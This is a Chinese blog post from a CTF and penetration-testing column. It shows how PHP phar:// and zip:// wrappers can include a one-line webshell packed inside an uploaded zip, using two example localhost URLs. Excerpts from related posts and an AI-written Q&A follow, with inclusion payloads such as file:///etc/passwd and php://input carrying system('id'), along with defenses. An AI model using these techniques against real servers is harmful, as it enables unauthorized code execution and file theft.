phar://、zip://伪协议进行shell上传

最新推荐文章于 2025-04-03 20:33:30 发布
最新推荐文章于 2025-04-03 20:33:30 发布
阅读量1.4k 收藏 3
点赞数 3
分类专栏: CTF刷题 渗透测试 文章标签: tcp/ip 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43749601/article/details/118026330
版权
本文介绍了一种通过Phar与Zip协议来绕过服务器限制并加载WebShell的方法。具体步骤包括创建一句话木马shell.php,将其压缩为zip格式上传至服务器,再通过特定URL格式访问实现远程加载。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

phar://

环境:可上传png、zip
首先写一个一句话木马shell.php接着压缩成zip文件。上传文件后使用shell工具进行连接。
http://localhost/?url=phar://uploads/63e93ffe53f03e93bb0a0249152d243874e31c9b.zip/shell

zip://

环境:可上传png、zip
首先写一个一句话木马shell.php接着压缩成zip文件。直接上传zip文件,然后使用shell工具进行连接。
http://localhost/?url=zip:///var/www/html/upload/892e38cea0c47c744ecc60ccacc94c23.zip%23shell

伪协议绕过总结记录(本地文件包含、远程文件包含、SSRF)
墨痕诉清风的博客
01-16 1405
如果LFI只是阅读文件,而不是执行其中的php代码,例如使用file_get_contents()、fopen()、file()或file_exists()、md5_file()、filemtime()或filesize()等函数。这个特性最好的一点是,即使使用不评估PHP代码的PHP函数,如file_get_contents()、fopen()、file()或file_exists()、md5_file()、filemtime()或filesize(),也会发生这种反编译。轻量级目录访问协议。
[代码审计篇]php代码审计之浅析Phar伪协议
qq_43668710的博客
04-15 1622
0x01 前言 简要说明 写这篇博客的目的只有两个 为**[代码审计篇]**中关于php反序列化漏洞的审计作铺垫 为上一篇博客做点漏洞原理的补充 环境工具 Win10 Phpstudy_pro Sublime_Text 3 注意(tips) PHAR的使用需要将php.ini设置phar.readonly设置为Off才能用于PHAR对象 PHAR 这个词是PHP和 Archive的组合词,基...
WEB安全--文件上传漏洞--php伪协议的利用
最新发布
m0_74800552的博客
04-03 1410
在 PHP 中,通常指的是一种通过特定的 URL 协议方案实现某些特殊功能或行为的方式。伪协议通常并不是标准的协议(如 HTTP、HTTPS),而是由应用程序或开发者自定义的“伪”协议,用于执行某些特定任务。
php文件包含 伪协议
m0_64361111的博客
02-28 1182
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
文件上传zip伪协议上传解析
serendipity1130的博客
08-29 2391
1.打开界面是登陆框,查看源码,发现有文件包含include($_GET['file']) 2.然后根据题目名称:文件上传,访问网址:/upload.php发现了文件上传点,先上传了jpg图片,发现不能用菜刀连接,应该是无法解析jpg。 3.因为有文件包含,所以考虑到使用伪协议包含木马图片的文件进行菜刀连接,因为都有过滤,最终尝试了zip伪协议可以进行访问。 4.方法:首先制作一句话木马的zip包,然后将后缀名改为jpg,进行上传上传成功后复制图片地址,可以发现图片的地址为upload/2.jpg
w24文件上传之PHP伪协议
三旬的博客
01-27 453
file:// - 访问本地文件系统http:// - 访问网址ftp:// - 访问文件php:// -访问各个输入/输出流zlib:// -压缩流data:// - 数据glob:// -查找匹配的文件路径模式phar:// - php归档ogg:// - 音频流expect:// - 处理交互式的流。
php伪协议phar
woshicainiao666的博客
02-19 1592
php伪协议---phar
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 7913
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
php伪协议介绍
qq_74263993的博客
11-09 666
将一句话木马(shell.php)压缩成压缩包形式(shell.zip),将压缩包后缀改为.jpg(shell.jpg)或者png。file:// 用于访问本地文件系统,比如:在CTF中通常用来读取本地文件的且不受配置文件中allow_url_fopen与allow_url_include的影响。:一般配合post输入,它提供了一种直接获取 POST 请求数据的方式,尤其适用于处理来自客户端的原始数据,适合执行php文件。(当可以使用php://filter,但是。--------本地文件传输协议。
WEB入门——文件包含漏洞与PHP伪协议
HasntStartIsOver的博客
06-04 1108
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。
文件包含&PHP伪协议利用
技术超强的网络安全平台
11-20 6217
文件包含&PHP伪协议利用 相关函数 要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件: 1、Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件; 2、用户能够控制该动态变量。 php中引发文件包含漏洞的通常是以下四个函数: (1) Require: 找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本,如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。; (2) Require_once:与 include 类
phar是啥?
09-18 850
C#可以把代码打包成dll java可以把代码打包成jar 那么凭什么PHP不可以?实际上在PHP5.3之后就出现了类似的东西叫做phar新建build.txt:<?php$phar = new Phar("test.phar"); $phar->buildFromDirectory(__DIR__.'/files','/\.php$/'); //编译files目录下的所有.php文件 $p
文件包含之——phar伪协议
abc18964814133的博客
05-09 8404
文件上传phar伪协议
PHP安全 [伪协议]
weixin_45253622的博客
05-18 1112
PHP安全 [伪协议] file://协议 ​http://协议 php://协议 zip:// bzip2:// zlib://协议 data://协议 phar:// 协议 首先在\DVWA-master\vulnerabilities\fi\目录下新建1.txt 2.txt 3.zip方便环境测试。 file://协议 file协议主要用于访问本地计算机中的文件,也就是用于访问本地文件系统,且不受allow_url_fopen与allow_url_include的影响..
[SWPUCTF 2018]SimplePHP phar漏洞及其文件上传
qq_54929891的博客
03-27 3347
在查看文件这个页面发现一个可疑参数file,试试能不能读取源代码 根据include包含来将各个文件源代码都提取出来,最重要的是class.php <?php class C1e4r { public $test; public $str; public function __destruct() { $this->test = $this->str; echo $this->test; } } ..
php代码审计15.3之phar伪协议与反序列化
划水的小白白
07-15 966
1、基础 2、生成phar格式文件 3、例子 4、小试牛刀
【文件包含中的伪协议
My笔记的博客
05-15 1789
php.ini 中的两个重要选项 PHP 中几个比较重要的伪协议:php://input 协议还可以用来生成一句话木马,这里假设我们用的之前的直接包含的php代码: 这是一个文件上传的页面可以上传一个文件上去 上传后发现失败了,那就说明不是文件上传的题目,我们在url地址栏发现了一个op参数和一个key参数,我们用文件审查查看一下源代码 点开后,看到一个op的参数,看到这个好参数我们会想到可能存在文件包含,比如我们改成upload 就变成了上传文件的页面,这里我们可以猜到通过op的参数包含不同的文件
文件包含伪协议
03-23
<think>好的,用户想了解文件包含伪协议的使用场景及安全风险。首先,我需要回顾一下PHP伪协议的基本概念,然后结合现有的引用资料来组织回答。 根据引用[2],PHP伪协议是支持的协议与封装协议,用于文件系统函数,比如fopen()、file_exists()等。常见的有file://、php://zip://等。使用场景可能包括文件包含、读取资源、数据流处理等。比如在CTF比赛中,选手可能会用这些协议绕过文件包含限制,引用[2]和[5]都提到了文件包含漏洞的应用。 安全风险方面,引用[1]提到伪协议存在安全隐患,特别是未经验证的用户输入可能导致文件泄露或代码执行。例如,如果允许用户控制文件路径,攻击者可能利用php://input执行恶意代码,或者用file://读取系统敏感文件。引用[4]提到的RFI(远程文件包含)也是一种风险,但需要allow_url_include开启,不过伪协议更多涉及本地文件包含。 需要具体说明使用场景,比如开发中的动态加载、数据流处理,以及漏洞利用场景。安全防护措施方面,引用[4]提到参数化白名单,限制允许的协议和路径,引用[1]建议输入验证和过滤。 还要注意引用资料的对应,比如引用[2]解释伪协议的原理,引用[5]提到文件包含的前提条件。可能需要分点回答,确保结构清晰,符合用户要求的中文回答,并且正确使用LaTeX格式,比如变量用$...$,独立公式用$$...$$,不过这里可能数学公式较少,但要注意变量如$_GET['file']的正确格式。 最后生成相关问题,可能需要围绕其他协议、具体漏洞案例、防御措施等展开。检查是否有遗漏的信息,比如不同协议的具体风险例子,如php://filter用于读取源码,zip://绕过文件上传限制等。确保回答覆盖用户需求,并正确引用资料。</think>### 文件包含伪协议的使用场景及安全风险 #### 一、使用场景 1. **动态资源加载** 在PHP开发中,文件包含伪协议(如`php://input`、`php://filter`)常用于动态读取文件内容或处理数据流。例如: ```php // 通过php://input获取POST原始数据 $data = file_get_contents('php://input'); ``` 这种场景适用于API开发或流式数据处理[^2]。 2. **文件包含功能** 伪协议可用于包含本地或远程文件,例如: ```php include($_GET['file']); // 用户可能传入phar://zip://路径 ``` 在CTF比赛中,常用`php://filter`读取源码(如`php://filter/convert.base64-encode/resource=index.php`)[^5]。 3. **压缩包操作** 使用`zip://`协议直接访问压缩包内文件,无需解压: ```php $content = file_get_contents('zip://archive.zip#file.txt'); ``` #### 二、安全风险 1. **敏感文件泄露** 若未过滤用户输入,攻击者可通过`file://`协议读取系统文件: ```php include($_GET['file']); // 用户传入file:///etc/passwd ``` 导致敏感信息泄露[^5]。 2. **远程代码执行** 当`allow_url_include`开启时,攻击者可利用`php://input`注入恶意代码: ```php // 用户传入php://input,POST正文为<?php system('id'); ?> include($_GET['file']); ``` 从而执行任意命令[^4]。 3. **绕过文件限制** 使用`phar://`或`zip://`协议可绕过文件扩展名限制。例如上传图片马后,通过`phar://uploads/image.jpg/shell.php`解析其中的PHP代码。 #### 三、防御措施 1. **输入验证与白名单** 限制文件路径为固定范围,例如: ```php $allowed = ['page1.php', 'page2.php']; $file = $_GET['file']; if (!in_array($file, $allowed)) die("Invalid request"); ``` 此方法可有效避免非法协议调用[^4]。 2. **禁用危险配置** 在`php.ini`中关闭高风险选项: ```ini allow_url_include = Off allow_url_fopen = Off ``` 3. **过滤协议前缀** 对用户输入的协议进行检测和过滤: ```php $file = str_replace(['php://', 'file://'], '', $file); ``` 4. **最小权限原则** 确保Web服务器进程仅拥有必要文件的读取权限,避免越权访问[^1][^3]。 --- ### 相关问题 1. `php://filter`协议如何用于读取源码? 2. 如何通过`phar://`协议绕过文件上传限制? 3. 文件包含漏洞与远程代码执行(RCE)有何关联? 4. 防御文件包含攻击的最佳实践有哪些? [^1]: PHP伪协议的安全防护需结合输入验证与配置优化 : 伪协议在CTF中常用于文件包含和源码泄露 : 参数化白名单可有效控制文件包含风险 : 文件包含漏洞需满足目标存在且可读的条件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值